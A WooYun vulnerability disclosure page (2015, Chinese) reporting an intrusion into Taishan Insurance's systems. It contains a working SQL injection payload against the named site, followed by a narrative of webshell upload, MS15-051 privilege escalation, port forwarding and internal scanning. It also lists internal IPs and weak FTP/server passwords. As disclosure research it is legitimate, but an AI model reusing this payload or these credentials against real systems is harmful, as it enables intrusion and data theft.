当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129510

漏洞标题:泰山保险某系统多处漏洞导致内网漫游(沦陷多台重要服务器/重要资料泄露)

相关厂商:泰山保险

漏洞作者: wps2015

提交时间:2015-07-27 09:48

修复时间:2015-09-15 09:04

公开时间:2015-09-15 09:04

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-27: 细节已通知厂商并且等待厂商处理中
2015-08-01: 厂商已经确认,细节仅向厂商公开
2015-08-11: 细节向核心白帽子及相关领域专家公开
2015-08-21: 细节向普通白帽子公开
2015-08-31: 细节向实习白帽子公开
2015-09-15: 细节向公众公开

简要描述:

内网漫游

详细说明:

问题出在泰山保险主站:http://www.taishanpic.com
多处sql注入:http://www.taishanpic.com/TSHBX/PortalContentInfo.aspx?ContentID=dee75e3b-e2e0-40bc-9de9-da16adf96726
payload:

http://www.taishanpic.com/tshbx/PortalContentInfo.aspx?ContentID=8298' UNION ALL SELECT NULL,NULL,NULL,db_name(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


sql.png


并且注入点为dba权限,直接os-shell成功,但是查看了一下ip为内网地址

Ethernet adapter 本地连接:\r
\r
Connection-specific DNS Suffix . : \r
Description . . . . . . . . . . . : Intel(R) 82575EB Gigabit Network Connection\r
Physical Address. . . . . . . . . : 00-30-48-BF-B1-06\r
DHCP Enabled. . . . . . . . . . . : No\r
IP Address. . . . . . . . . . . . : 10.1.5.1\r
Subnet Mask . . . . . . . . . . . : 255.255.255.0\r
Default Gateway . . . . . . . . . : 10.1.5.254\r
DNS Servers . . . . . . . . . . . : 10.1.2.1\r
10.1.2.2\r


所以这个地方必须得拿到shell才行。先读取iis的配置文件metabase.xml,很奇怪,没有找到网站路径。没办法只能利用dir指令去读盘,发现了好几处疑似网站目录,但是写成功后,无法访问成功,并且这几处目录里的文件有的在网站上可以访问,有的却不能访问,觉得很奇怪,终于在admin目录下发现了下面的一些文件,有的可以在网站目录下未授权访问

upload.png


访问http://www.taishanpic.com/admin/ImportBasicData.aspx,发现可以上传文件

1.png


这里利用burp抓包上传后,会返回上传文件的物理路径

2.png


返回的物理路径在之前读盘时是不存在的,终于明白了这是站库分离的,但是数据库上有网站目录的一些备份(还是很幸运),拿到shell
http://www.taishanpic.com/PublicForm/attachment/UploadExcels/a6a919f1-e642-41df-a796-5b4bf69c8792.aspx (Seayace)
看了一下服务器版本win server 2008,直接上ms15-051提权成功,这个也是内网的ip,并且网段不同

1.png


lcx将端口转发出来,连上

127.png


先读取了本机管理员的密码,加到hscan的字典库里,进行扫描

hscan.png


多个ftp,服务器弱口令,由于太多以下只给出几个示例:
ftp://10.1.3.14/ root 123456

ftp.png


ftp://10.1.3.120 oracle oracle

10.1.3.120.png


由于站库分离,数据库的那个服务器直接拿下
数据库服务器:10.1.5.1

10.1.5.1.png


ICBC控件服务器:192.68.1.20 (弱口令)

192.168.1.20.png


服务器:10.1.3.119 (弱口令)

10.1.3.119.png

漏洞证明:

多个敏感文件

敏感文件.png


敏感文件1.png


222.png


修复方案:

各种修改

版权声明:转载请注明来源 wps2015@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-01 09:03

厂商回复:

cnvd确信并复现所述情况,已经转由cncert向保险行业信息化主管部门通报,由其后续协调网站管理单位处置。按运行安全风险评分,rank 20

最新状态:

暂无